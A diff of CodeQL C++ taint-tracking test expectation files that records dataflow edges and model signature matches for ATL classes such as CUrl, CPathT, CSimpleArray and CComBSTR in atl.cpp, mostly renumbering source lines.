-| atl.cpp:865:5:865:8 | ref arg url2 | atl.cpp:868:3:868:3 | url2 | | -| atl.cpp:866:20:866:25 | ref arg buffer | atl.cpp:867:10:867:15 | buffer | | -| atl.cpp:866:28:866:31 | ref arg & ... | atl.cpp:866:29:866:31 | len [inner post update] | | -| atl.cpp:866:29:866:31 | len | atl.cpp:866:28:866:31 | & ... | | -| atl.cpp:870:10:870:13 | call to CUrl | atl.cpp:871:5:871:8 | url2 | | -| atl.cpp:870:10:870:13 | call to CUrl | atl.cpp:872:10:872:13 | url2 | | -| atl.cpp:870:10:870:13 | call to CUrl | atl.cpp:873:3:873:3 | url2 | | -| atl.cpp:871:5:871:8 | ref arg url2 | atl.cpp:872:10:872:13 | url2 | | -| atl.cpp:871:5:871:8 | ref arg url2 | atl.cpp:873:3:873:3 | url2 | | -| atl.cpp:875:10:875:13 | call to CUrl | atl.cpp:876:5:876:8 | url2 | | -| atl.cpp:875:10:875:13 | call to CUrl | atl.cpp:877:10:877:13 | url2 | | -| atl.cpp:875:10:875:13 | call to CUrl | atl.cpp:878:3:878:3 | url2 | | -| atl.cpp:876:5:876:8 | ref arg url2 | atl.cpp:877:10:877:13 | url2 | | -| atl.cpp:876:5:876:8 | ref arg url2 | atl.cpp:878:3:878:3 | url2 | | -| atl.cpp:880:10:880:13 | call to CUrl | atl.cpp:881:5:881:8 | url2 | | -| atl.cpp:880:10:880:13 | call to CUrl | atl.cpp:882:10:882:13 | url2 | | -| atl.cpp:880:10:880:13 | call to CUrl | atl.cpp:883:3:883:3 | url2 | | -| atl.cpp:881:5:881:8 | ref arg url2 | atl.cpp:882:10:882:13 | url2 | | -| atl.cpp:881:5:881:8 | ref arg url2 | atl.cpp:883:3:883:3 | url2 | | -| atl.cpp:885:10:885:13 | call to CUrl | atl.cpp:886:5:886:8 | url2 | | -| atl.cpp:885:10:885:13 | call to CUrl | atl.cpp:887:10:887:13 | url2 | | -| atl.cpp:885:10:885:13 | call to CUrl | atl.cpp:888:3:888:3 | url2 | | -| atl.cpp:886:5:886:8 | ref arg url2 | atl.cpp:887:10:887:13 | url2 | | -| atl.cpp:886:5:886:8 | ref arg url2 | atl.cpp:888:3:888:3 | url2 | | -| atl.cpp:890:10:890:13 | call to CUrl | atl.cpp:891:5:891:8 | url2 | | -| atl.cpp:890:10:890:13 | call to CUrl | atl.cpp:892:10:892:13 | url2 | | -| atl.cpp:890:10:890:13 | call to CUrl | atl.cpp:893:3:893:3 | url2 | | -| 
atl.cpp:891:5:891:8 | ref arg url2 | atl.cpp:892:10:892:13 | url2 | | -| atl.cpp:891:5:891:8 | ref arg url2 | atl.cpp:893:3:893:3 | url2 | | -| atl.cpp:895:10:895:13 | call to CUrl | atl.cpp:896:5:896:8 | url2 | | -| atl.cpp:895:10:895:13 | call to CUrl | atl.cpp:897:10:897:13 | url2 | | -| atl.cpp:895:10:895:13 | call to CUrl | atl.cpp:898:3:898:3 | url2 | | -| atl.cpp:896:5:896:8 | ref arg url2 | atl.cpp:897:10:897:13 | url2 | | -| atl.cpp:896:5:896:8 | ref arg url2 | atl.cpp:898:3:898:3 | url2 | | +| atl.cpp:595:10:595:10 | ref arg c | atl.cpp:597:10:597:10 | c | | +| atl.cpp:595:10:595:10 | ref arg c | atl.cpp:598:3:598:3 | c | | +| atl.cpp:596:10:596:10 | ref arg c | atl.cpp:597:10:597:10 | c | | +| atl.cpp:596:10:596:10 | ref arg c | atl.cpp:598:3:598:3 | c | | +| atl.cpp:597:10:597:10 | ref arg c | atl.cpp:598:3:598:3 | c | | +| atl.cpp:600:24:600:24 | call to CComSafeArray | atl.cpp:601:5:601:5 | c | | +| atl.cpp:600:24:600:24 | call to CComSafeArray | atl.cpp:602:10:602:10 | c | | +| atl.cpp:600:24:600:24 | call to CComSafeArray | atl.cpp:603:10:603:10 | c | | +| atl.cpp:600:24:600:24 | call to CComSafeArray | atl.cpp:604:3:604:3 | c | | +| atl.cpp:601:5:601:5 | ref arg c | atl.cpp:602:10:602:10 | c | | +| atl.cpp:601:5:601:5 | ref arg c | atl.cpp:603:10:603:10 | c | | +| atl.cpp:601:5:601:5 | ref arg c | atl.cpp:604:3:604:3 | c | | +| atl.cpp:602:10:602:10 | ref arg c | atl.cpp:603:10:603:10 | c | | +| atl.cpp:602:10:602:10 | ref arg c | atl.cpp:604:3:604:3 | c | | +| atl.cpp:603:10:603:10 | ref arg c | atl.cpp:604:3:604:3 | c | | +| atl.cpp:665:13:665:33 | call to indirect_source | atl.cpp:666:11:666:11 | x | | +| atl.cpp:665:13:665:33 | call to indirect_source | atl.cpp:675:20:675:20 | x | | +| atl.cpp:665:13:665:33 | call to indirect_source | atl.cpp:680:14:680:14 | x | | +| atl.cpp:665:13:665:33 | call to indirect_source | atl.cpp:688:11:688:11 | x | | +| atl.cpp:665:13:665:33 | call to indirect_source | atl.cpp:694:15:694:15 | x | | +| 
atl.cpp:665:13:665:33 | call to indirect_source | atl.cpp:699:24:699:24 | x | | +| atl.cpp:665:13:665:33 | call to indirect_source | atl.cpp:705:30:705:30 | x | | +| atl.cpp:666:11:666:11 | ref arg x | atl.cpp:675:20:675:20 | x | | +| atl.cpp:666:11:666:11 | ref arg x | atl.cpp:680:14:680:14 | x | | +| atl.cpp:666:11:666:11 | ref arg x | atl.cpp:688:11:688:11 | x | | +| atl.cpp:666:11:666:11 | ref arg x | atl.cpp:694:15:694:15 | x | | +| atl.cpp:666:11:666:11 | ref arg x | atl.cpp:699:24:699:24 | x | | +| atl.cpp:666:11:666:11 | ref arg x | atl.cpp:705:30:705:30 | x | | +| atl.cpp:666:11:666:11 | x | atl.cpp:666:11:666:12 | call to CPathT | TAINT | +| atl.cpp:666:11:666:12 | call to CPathT | atl.cpp:667:27:667:27 | p | | +| atl.cpp:666:11:666:12 | call to CPathT | atl.cpp:668:8:668:8 | p | | +| atl.cpp:666:11:666:12 | call to CPathT | atl.cpp:670:12:670:12 | p | | +| atl.cpp:667:27:667:27 | ref arg p | atl.cpp:668:8:668:8 | p | | +| atl.cpp:667:27:667:27 | ref arg p | atl.cpp:670:12:670:12 | p | | +| atl.cpp:668:8:668:8 | p [post update] | atl.cpp:670:12:670:12 | p | | +| atl.cpp:668:10:668:18 | ref arg m_strPath | atl.cpp:671:11:671:19 | m_strPath | | +| atl.cpp:670:12:670:12 | p | atl.cpp:670:12:670:13 | call to CPathT | | +| atl.cpp:670:12:670:13 | call to CPathT | atl.cpp:671:8:671:9 | p2 | | +| atl.cpp:674:11:674:11 | call to CPathT | atl.cpp:675:5:675:5 | p | | +| atl.cpp:674:11:674:11 | call to CPathT | atl.cpp:676:10:676:10 | p | | +| atl.cpp:675:5:675:5 | ref arg p | atl.cpp:676:10:676:10 | p | | +| atl.cpp:675:20:675:20 | ref arg x | atl.cpp:680:14:680:14 | x | | +| atl.cpp:675:20:675:20 | ref arg x | atl.cpp:688:11:688:11 | x | | +| atl.cpp:675:20:675:20 | ref arg x | atl.cpp:694:15:694:15 | x | | +| atl.cpp:675:20:675:20 | ref arg x | atl.cpp:699:24:699:24 | x | | +| atl.cpp:675:20:675:20 | ref arg x | atl.cpp:705:30:705:30 | x | | +| atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:680:5:680:5 | p | | +| atl.cpp:679:11:679:11 | call to CPathT | 
atl.cpp:681:10:681:10 | p | | +| atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:684:11:684:11 | p | | +| atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:685:10:685:10 | p | | +| atl.cpp:679:11:679:11 | call to CPathT | atl.cpp:689:10:689:10 | p | | +| atl.cpp:680:5:680:5 | ref arg p | atl.cpp:681:10:681:10 | p | | +| atl.cpp:680:5:680:5 | ref arg p | atl.cpp:684:11:684:11 | p | | +| atl.cpp:680:5:680:5 | ref arg p | atl.cpp:685:10:685:10 | p | | +| atl.cpp:680:5:680:5 | ref arg p | atl.cpp:689:10:689:10 | p | | +| atl.cpp:680:14:680:14 | ref arg x | atl.cpp:688:11:688:11 | x | | +| atl.cpp:680:14:680:14 | ref arg x | atl.cpp:694:15:694:15 | x | | +| atl.cpp:680:14:680:14 | ref arg x | atl.cpp:699:24:699:24 | x | | +| atl.cpp:680:14:680:14 | ref arg x | atl.cpp:705:30:705:30 | x | | +| atl.cpp:681:10:681:10 | p [post update] | atl.cpp:684:11:684:11 | p | | +| atl.cpp:681:10:681:10 | p [post update] | atl.cpp:685:10:685:10 | p | | +| atl.cpp:681:10:681:10 | p [post update] | atl.cpp:689:10:689:10 | p | | +| atl.cpp:681:12:681:20 | ref arg m_strPath | atl.cpp:685:12:685:20 | m_strPath | | +| atl.cpp:681:12:681:20 | ref arg m_strPath | atl.cpp:689:12:689:20 | m_strPath | | +| atl.cpp:683:11:683:12 | call to CPathT | atl.cpp:684:5:684:6 | p2 | | +| atl.cpp:684:11:684:11 | call to operator char *& | atl.cpp:684:8:684:8 | call to operator+= | TAINT | +| atl.cpp:684:11:684:11 | ref arg p | atl.cpp:685:10:685:10 | p | | +| atl.cpp:684:11:684:11 | ref arg p | atl.cpp:689:10:689:10 | p | | +| atl.cpp:685:10:685:10 | p [post update] | atl.cpp:689:10:689:10 | p | | +| atl.cpp:685:12:685:20 | ref arg m_strPath | atl.cpp:689:12:689:20 | m_strPath | | +| atl.cpp:687:11:687:12 | call to CPathT | atl.cpp:688:5:688:6 | p3 | | +| atl.cpp:688:11:688:11 | ref arg x | atl.cpp:694:15:694:15 | x | | +| atl.cpp:688:11:688:11 | ref arg x | atl.cpp:699:24:699:24 | x | | +| atl.cpp:688:11:688:11 | ref arg x | atl.cpp:705:30:705:30 | x | | +| atl.cpp:688:11:688:11 | x | atl.cpp:688:8:688:8 | 
call to operator+= | TAINT | +| atl.cpp:693:11:693:11 | call to CPathT | atl.cpp:694:5:694:5 | p | | +| atl.cpp:693:11:693:11 | call to CPathT | atl.cpp:695:10:695:10 | p | | +| atl.cpp:694:5:694:5 | ref arg p | atl.cpp:695:10:695:10 | p | | +| atl.cpp:694:15:694:15 | ref arg x | atl.cpp:699:24:699:24 | x | | +| atl.cpp:694:15:694:15 | ref arg x | atl.cpp:705:30:705:30 | x | | +| atl.cpp:698:11:698:11 | call to CPathT | atl.cpp:699:5:699:5 | p | | +| atl.cpp:698:11:698:11 | call to CPathT | atl.cpp:700:10:700:10 | p | | +| atl.cpp:699:5:699:5 | ref arg p | atl.cpp:700:10:700:10 | p | | +| atl.cpp:699:24:699:24 | ref arg x | atl.cpp:705:30:705:30 | x | | +| atl.cpp:704:11:704:11 | call to CPathT | atl.cpp:705:15:705:15 | p | | +| atl.cpp:705:17:705:28 | call to CommonPrefix | atl.cpp:706:10:706:11 | p2 | | +| atl.cpp:705:17:705:28 | call to CommonPrefix | atl.cpp:707:10:707:11 | p2 | | +| atl.cpp:706:10:706:11 | p2 [post update] | atl.cpp:707:10:707:11 | p2 | | +| atl.cpp:734:11:734:21 | call to source | atl.cpp:737:11:737:11 | x | | +| atl.cpp:734:11:734:21 | call to source | atl.cpp:749:11:749:11 | x | | +| atl.cpp:734:11:734:21 | call to source | atl.cpp:753:23:753:23 | x | | +| atl.cpp:736:23:736:23 | call to CSimpleArray | atl.cpp:737:5:737:5 | a | | +| atl.cpp:736:23:736:23 | call to CSimpleArray | atl.cpp:738:10:738:10 | a | | +| atl.cpp:736:23:736:23 | call to CSimpleArray | atl.cpp:739:5:739:5 | a | | +| atl.cpp:736:23:736:23 | call to CSimpleArray | atl.cpp:740:10:740:10 | a | | +| atl.cpp:736:23:736:23 | call to CSimpleArray | atl.cpp:744:10:744:10 | a | | +| atl.cpp:736:23:736:23 | call to CSimpleArray | atl.cpp:746:3:746:3 | a | | +| atl.cpp:737:5:737:5 | ref arg a | atl.cpp:738:10:738:10 | a | | +| atl.cpp:737:5:737:5 | ref arg a | atl.cpp:739:5:739:5 | a | | +| atl.cpp:737:5:737:5 | ref arg a | atl.cpp:740:10:740:10 | a | | +| atl.cpp:737:5:737:5 | ref arg a | atl.cpp:744:10:744:10 | a | | +| atl.cpp:737:5:737:5 | ref arg a | atl.cpp:746:3:746:3 | a | 
| +| atl.cpp:738:10:738:10 | ref arg a | atl.cpp:739:5:739:5 | a | | +| atl.cpp:738:10:738:10 | ref arg a | atl.cpp:740:10:740:10 | a | | +| atl.cpp:738:10:738:10 | ref arg a | atl.cpp:744:10:744:10 | a | | +| atl.cpp:738:10:738:10 | ref arg a | atl.cpp:746:3:746:3 | a | | +| atl.cpp:739:5:739:5 | ref arg a | atl.cpp:740:10:740:10 | a | | +| atl.cpp:739:5:739:5 | ref arg a | atl.cpp:744:10:744:10 | a | | +| atl.cpp:739:5:739:5 | ref arg a | atl.cpp:746:3:746:3 | a | | +| atl.cpp:740:10:740:10 | ref arg a | atl.cpp:744:10:744:10 | a | | +| atl.cpp:740:10:740:10 | ref arg a | atl.cpp:746:3:746:3 | a | | +| atl.cpp:742:23:742:24 | call to CSimpleArray | atl.cpp:743:10:743:11 | a2 | | +| atl.cpp:742:23:742:24 | call to CSimpleArray | atl.cpp:744:5:744:6 | a2 | | +| atl.cpp:742:23:742:24 | call to CSimpleArray | atl.cpp:745:10:745:11 | a2 | | +| atl.cpp:742:23:742:24 | call to CSimpleArray | atl.cpp:746:3:746:3 | a2 | | +| atl.cpp:743:10:743:11 | ref arg a2 | atl.cpp:744:5:744:6 | a2 | | +| atl.cpp:743:10:743:11 | ref arg a2 | atl.cpp:745:10:745:11 | a2 | | +| atl.cpp:743:10:743:11 | ref arg a2 | atl.cpp:746:3:746:3 | a2 | | +| atl.cpp:744:5:744:6 | ref arg a2 | atl.cpp:745:10:745:11 | a2 | | +| atl.cpp:744:5:744:6 | ref arg a2 | atl.cpp:746:3:746:3 | a2 | | +| atl.cpp:744:10:744:10 | a | atl.cpp:744:5:744:6 | ref arg a2 | TAINT | +| atl.cpp:744:10:744:10 | a | atl.cpp:744:8:744:8 | call to operator= | TAINT | +| atl.cpp:745:10:745:11 | ref arg a2 | atl.cpp:746:3:746:3 | a2 | | +| atl.cpp:748:23:748:23 | call to CSimpleArray | atl.cpp:749:5:749:5 | a | | +| atl.cpp:748:23:748:23 | call to CSimpleArray | atl.cpp:750:10:750:10 | a | | +| atl.cpp:748:23:748:23 | call to CSimpleArray | atl.cpp:755:3:755:3 | a | | +| atl.cpp:749:5:749:5 | ref arg a | atl.cpp:750:10:750:10 | a | | +| atl.cpp:749:5:749:5 | ref arg a | atl.cpp:755:3:755:3 | a | | +| atl.cpp:750:10:750:10 | ref arg a | atl.cpp:755:3:755:3 | a | | +| atl.cpp:752:23:752:24 | call to CSimpleArray | 
atl.cpp:753:15:753:16 | a2 | | +| atl.cpp:752:23:752:24 | call to CSimpleArray | atl.cpp:754:10:754:11 | a2 | | +| atl.cpp:752:23:752:24 | call to CSimpleArray | atl.cpp:755:3:755:3 | a2 | | +| atl.cpp:753:18:753:21 | call to Find | atl.cpp:754:13:754:15 | pos | | +| atl.cpp:754:10:754:11 | ref arg a2 | atl.cpp:755:3:755:3 | a2 | | +| atl.cpp:779:16:779:31 | call to source | atl.cpp:782:20:782:20 | x | | +| atl.cpp:779:16:779:31 | call to source | atl.cpp:792:26:792:26 | x | | +| atl.cpp:779:16:779:31 | call to source | atl.cpp:797:32:797:32 | x | | +| atl.cpp:779:16:779:31 | call to source | atl.cpp:803:22:803:22 | x | | +| atl.cpp:779:16:779:31 | call to source | atl.cpp:808:30:808:30 | x | | +| atl.cpp:781:33:781:33 | call to CSimpleMap | atl.cpp:782:5:782:5 | a | | +| atl.cpp:781:33:781:33 | call to CSimpleMap | atl.cpp:783:10:783:10 | a | | +| atl.cpp:781:33:781:33 | call to CSimpleMap | atl.cpp:784:3:784:3 | a | | +| atl.cpp:782:5:782:5 | ref arg a | atl.cpp:783:10:783:10 | a | | +| atl.cpp:782:5:782:5 | ref arg a | atl.cpp:784:3:784:3 | a | | +| atl.cpp:783:10:783:10 | ref arg a | atl.cpp:784:3:784:3 | a | | +| atl.cpp:786:33:786:33 | call to CSimpleMap | atl.cpp:787:16:787:16 | a | | +| atl.cpp:786:33:786:33 | call to CSimpleMap | atl.cpp:788:10:788:10 | a | | +| atl.cpp:786:33:786:33 | call to CSimpleMap | atl.cpp:789:3:789:3 | a | | +| atl.cpp:787:18:787:24 | call to FindKey | atl.cpp:788:23:788:25 | pos | | +| atl.cpp:788:10:788:10 | ref arg a | atl.cpp:789:3:789:3 | a | | +| atl.cpp:791:33:791:33 | call to CSimpleMap | atl.cpp:792:16:792:16 | a | | +| atl.cpp:791:33:791:33 | call to CSimpleMap | atl.cpp:793:10:793:10 | a | | +| atl.cpp:791:33:791:33 | call to CSimpleMap | atl.cpp:794:3:794:3 | a | | +| atl.cpp:792:18:792:24 | call to FindVal | atl.cpp:793:23:793:25 | pos | | +| atl.cpp:793:10:793:10 | ref arg a | atl.cpp:794:3:794:3 | a | | +| atl.cpp:796:33:796:33 | call to CSimpleMap | atl.cpp:797:16:797:16 | a | | +| atl.cpp:796:33:796:33 | call to 
CSimpleMap | atl.cpp:799:10:799:10 | a | | +| atl.cpp:796:33:796:33 | call to CSimpleMap | atl.cpp:800:3:800:3 | a | | +| atl.cpp:797:16:797:16 | ref arg a | atl.cpp:799:10:799:10 | a | | +| atl.cpp:797:16:797:16 | ref arg a | atl.cpp:800:3:800:3 | a | | +| atl.cpp:797:18:797:30 | call to ReverseLookup | atl.cpp:798:10:798:12 | key | | +| atl.cpp:797:18:797:30 | call to ReverseLookup | atl.cpp:799:19:799:21 | key | | +| atl.cpp:798:10:798:12 | ref arg key | atl.cpp:799:19:799:21 | key | | +| atl.cpp:799:10:799:10 | ref arg a | atl.cpp:800:3:800:3 | a | | +| atl.cpp:802:33:802:33 | call to CSimpleMap | atl.cpp:803:5:803:5 | a | | +| atl.cpp:802:33:802:33 | call to CSimpleMap | atl.cpp:804:10:804:10 | a | | +| atl.cpp:802:33:802:33 | call to CSimpleMap | atl.cpp:805:3:805:3 | a | | +| atl.cpp:803:5:803:5 | ref arg a | atl.cpp:804:10:804:10 | a | | +| atl.cpp:803:5:803:5 | ref arg a | atl.cpp:805:3:805:3 | a | | +| atl.cpp:804:10:804:10 | ref arg a | atl.cpp:805:3:805:3 | a | | +| atl.cpp:807:33:807:33 | call to CSimpleMap | atl.cpp:808:5:808:5 | a | | +| atl.cpp:807:33:807:33 | call to CSimpleMap | atl.cpp:809:10:809:10 | a | | +| atl.cpp:807:33:807:33 | call to CSimpleMap | atl.cpp:810:3:810:3 | a | | +| atl.cpp:808:5:808:5 | ref arg a | atl.cpp:809:10:809:10 | a | | +| atl.cpp:808:5:808:5 | ref arg a | atl.cpp:810:3:810:3 | a | | +| atl.cpp:809:10:809:10 | ref arg a | atl.cpp:810:3:810:3 | a | | +| atl.cpp:851:13:851:33 | call to indirect_source | atl.cpp:853:16:853:16 | x | | +| atl.cpp:851:13:851:33 | call to indirect_source | atl.cpp:866:19:866:19 | x | | +| atl.cpp:851:13:851:33 | call to indirect_source | atl.cpp:872:23:872:23 | x | | +| atl.cpp:851:13:851:33 | call to indirect_source | atl.cpp:877:22:877:22 | x | | +| atl.cpp:851:13:851:33 | call to indirect_source | atl.cpp:882:22:882:22 | x | | +| atl.cpp:851:13:851:33 | call to indirect_source | atl.cpp:887:24:887:24 | x | | +| atl.cpp:851:13:851:33 | call to indirect_source | atl.cpp:892:21:892:21 | x | | 
+| atl.cpp:851:13:851:33 | call to indirect_source | atl.cpp:897:22:897:22 | x | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:853:3:853:5 | url | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:854:8:854:10 | url | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:855:8:855:10 | url | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:856:8:856:10 | url | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:857:8:857:10 | url | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:858:8:858:10 | url | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:859:8:859:10 | url | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:860:8:860:10 | url | | +| atl.cpp:852:8:852:10 | call to CUrl | atl.cpp:900:1:900:1 | url | | +| atl.cpp:853:3:853:5 | ref arg url | atl.cpp:854:8:854:10 | url | | +| atl.cpp:853:3:853:5 | ref arg url | atl.cpp:855:8:855:10 | url | | +| atl.cpp:853:3:853:5 | ref arg url | atl.cpp:856:8:856:10 | url | | +| atl.cpp:853:3:853:5 | ref arg url | atl.cpp:857:8:857:10 | url | | +| atl.cpp:853:3:853:5 | ref arg url | atl.cpp:858:8:858:10 | url | | +| atl.cpp:853:3:853:5 | ref arg url | atl.cpp:859:8:859:10 | url | | +| atl.cpp:853:3:853:5 | ref arg url | atl.cpp:860:8:860:10 | url | | +| atl.cpp:853:3:853:5 | ref arg url | atl.cpp:900:1:900:1 | url | | +| atl.cpp:863:10:863:13 | call to CUrl | atl.cpp:866:5:866:8 | url2 | | +| atl.cpp:863:10:863:13 | call to CUrl | atl.cpp:867:5:867:8 | url2 | | +| atl.cpp:863:10:863:13 | call to CUrl | atl.cpp:869:3:869:3 | url2 | | +| atl.cpp:864:11:864:13 | len | atl.cpp:867:29:867:31 | len | | +| atl.cpp:865:10:865:15 | buffer | atl.cpp:867:20:867:25 | buffer | | +| atl.cpp:865:10:865:15 | buffer | atl.cpp:868:10:868:15 | buffer | | +| atl.cpp:866:5:866:8 | ref arg url2 | atl.cpp:867:5:867:8 | url2 | | +| atl.cpp:866:5:866:8 | ref arg url2 | atl.cpp:869:3:869:3 | url2 | | +| atl.cpp:867:20:867:25 | ref arg buffer | atl.cpp:868:10:868:15 | buffer | | +| atl.cpp:867:28:867:31 | ref arg & ... 
| atl.cpp:867:29:867:31 | len [inner post update] | | +| atl.cpp:867:29:867:31 | len | atl.cpp:867:28:867:31 | & ... | | +| atl.cpp:871:10:871:13 | call to CUrl | atl.cpp:872:5:872:8 | url2 | | +| atl.cpp:871:10:871:13 | call to CUrl | atl.cpp:873:10:873:13 | url2 | | +| atl.cpp:871:10:871:13 | call to CUrl | atl.cpp:874:3:874:3 | url2 | | +| atl.cpp:872:5:872:8 | ref arg url2 | atl.cpp:873:10:873:13 | url2 | | +| atl.cpp:872:5:872:8 | ref arg url2 | atl.cpp:874:3:874:3 | url2 | | +| atl.cpp:876:10:876:13 | call to CUrl | atl.cpp:877:5:877:8 | url2 | | +| atl.cpp:876:10:876:13 | call to CUrl | atl.cpp:878:10:878:13 | url2 | | +| atl.cpp:876:10:876:13 | call to CUrl | atl.cpp:879:3:879:3 | url2 | | +| atl.cpp:877:5:877:8 | ref arg url2 | atl.cpp:878:10:878:13 | url2 | | +| atl.cpp:877:5:877:8 | ref arg url2 | atl.cpp:879:3:879:3 | url2 | | +| atl.cpp:881:10:881:13 | call to CUrl | atl.cpp:882:5:882:8 | url2 | | +| atl.cpp:881:10:881:13 | call to CUrl | atl.cpp:883:10:883:13 | url2 | | +| atl.cpp:881:10:881:13 | call to CUrl | atl.cpp:884:3:884:3 | url2 | | +| atl.cpp:882:5:882:8 | ref arg url2 | atl.cpp:883:10:883:13 | url2 | | +| atl.cpp:882:5:882:8 | ref arg url2 | atl.cpp:884:3:884:3 | url2 | | +| atl.cpp:886:10:886:13 | call to CUrl | atl.cpp:887:5:887:8 | url2 | | +| atl.cpp:886:10:886:13 | call to CUrl | atl.cpp:888:10:888:13 | url2 | | +| atl.cpp:886:10:886:13 | call to CUrl | atl.cpp:889:3:889:3 | url2 | | +| atl.cpp:887:5:887:8 | ref arg url2 | atl.cpp:888:10:888:13 | url2 | | +| atl.cpp:887:5:887:8 | ref arg url2 | atl.cpp:889:3:889:3 | url2 | | +| atl.cpp:891:10:891:13 | call to CUrl | atl.cpp:892:5:892:8 | url2 | | +| atl.cpp:891:10:891:13 | call to CUrl | atl.cpp:893:10:893:13 | url2 | | +| atl.cpp:891:10:891:13 | call to CUrl | atl.cpp:894:3:894:3 | url2 | | +| atl.cpp:892:5:892:8 | ref arg url2 | atl.cpp:893:10:893:13 | url2 | | +| atl.cpp:892:5:892:8 | ref arg url2 | atl.cpp:894:3:894:3 | url2 | | +| atl.cpp:896:10:896:13 | call to CUrl | 
atl.cpp:897:5:897:8 | url2 | | +| atl.cpp:896:10:896:13 | call to CUrl | atl.cpp:898:10:898:13 | url2 | | +| atl.cpp:896:10:896:13 | call to CUrl | atl.cpp:899:3:899:3 | url2 | | +| atl.cpp:897:5:897:8 | ref arg url2 | atl.cpp:898:10:898:13 | url2 | | +| atl.cpp:897:5:897:8 | ref arg url2 | atl.cpp:899:3:899:3 | url2 | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected index 0d121219209..7e8a52fdb35 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected 
@@ -1,78 +1,78 @@ signatureMatches -| atl.cpp:68:3:68:15 | _U_STRINGorID | (UINT) | CComBSTR | LoadString | 0 | -| atl.cpp:68:3:68:15 | _U_STRINGorID | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:69:3:69:15 | _U_STRINGorID | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:256:3:256:10 | CAtlList | (UINT) | CComBSTR | LoadString | 0 | -| atl.cpp:256:3:256:10 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:410:3:410:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:410:3:410:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 1 | -| atl.cpp:411:3:411:10 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:411:3:411:10 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 1 | -| atl.cpp:412:3:412:10 | CComBSTR | (LPCOLESTR) | CComBSTR | Append | 0 | -| atl.cpp:412:3:412:10 | CComBSTR | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:413:3:413:10 | CComBSTR | (LPCSTR) | CComBSTR | Append | 0 | -| atl.cpp:413:3:413:10 | CComBSTR | (LPCSTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:418:11:418:16 | Append | (wchar_t) | CComBSTR | Append | 0 | -| atl.cpp:419:11:419:16 | Append | (char) | CComBSTR | Append | 0 | -| atl.cpp:420:11:420:16 | Append | (LPCOLESTR) | CComBSTR | Append | 0 | -| atl.cpp:420:11:420:16 | Append | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:421:11:421:16 | Append | (LPCSTR) | CComBSTR | Append | 0 | -| atl.cpp:421:11:421:16 | Append | (LPCSTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:422:11:422:16 | Append | (LPCOLESTR,int) | CComBSTR | Append | 0 | -| atl.cpp:422:11:422:16 | Append | (LPCOLESTR,int) | CComBSTR | Append | 1 | -| atl.cpp:424:11:424:21 | AppendBytes | (LPCOLESTR,int) | CComBSTR | Append | 1 | -| atl.cpp:425:11:425:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | Add | 0 | -| atl.cpp:425:11:425:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | -| atl.cpp:425:11:425:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | 
operator= | 0 | -| atl.cpp:437:8:437:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 0 | -| atl.cpp:437:8:437:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 1 | -| atl.cpp:437:8:437:17 | LoadString | (const SAFEARRAYBOUND *,UINT) | CComSafeArray | Create | 1 | -| atl.cpp:438:8:438:17 | LoadString | (UINT) | CComBSTR | LoadString | 0 | -| atl.cpp:438:8:438:17 | LoadString | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:447:13:447:22 | operator+= | (LPCOLESTR) | CComBSTR | Append | 0 | -| atl.cpp:447:13:447:22 | operator+= | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:537:3:537:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | Add | 0 | -| atl.cpp:537:3:537:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | -| atl.cpp:537:3:537:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | -| atl.cpp:541:11:541:13 | Add | (const SAFEARRAY *) | CComSafeArray | Add | 0 | -| atl.cpp:541:11:541:13 | Add | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | -| atl.cpp:541:11:541:13 | Add | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | -| atl.cpp:543:11:543:13 | Add | (const T &,BOOL) | CComSafeArray | Add | 0 | -| atl.cpp:543:11:543:13 | Add | (const T &,BOOL) | CComSafeArray | Add | 1 | -| atl.cpp:762:8:762:10 | Add | (const deque &,const Allocator &) | deque | deque | 1 | -| atl.cpp:762:8:762:10 | Add | (const forward_list &,const Allocator &) | forward_list | forward_list | 1 | -| atl.cpp:762:8:762:10 | Add | (const list &,const Allocator &) | list | list | 1 | 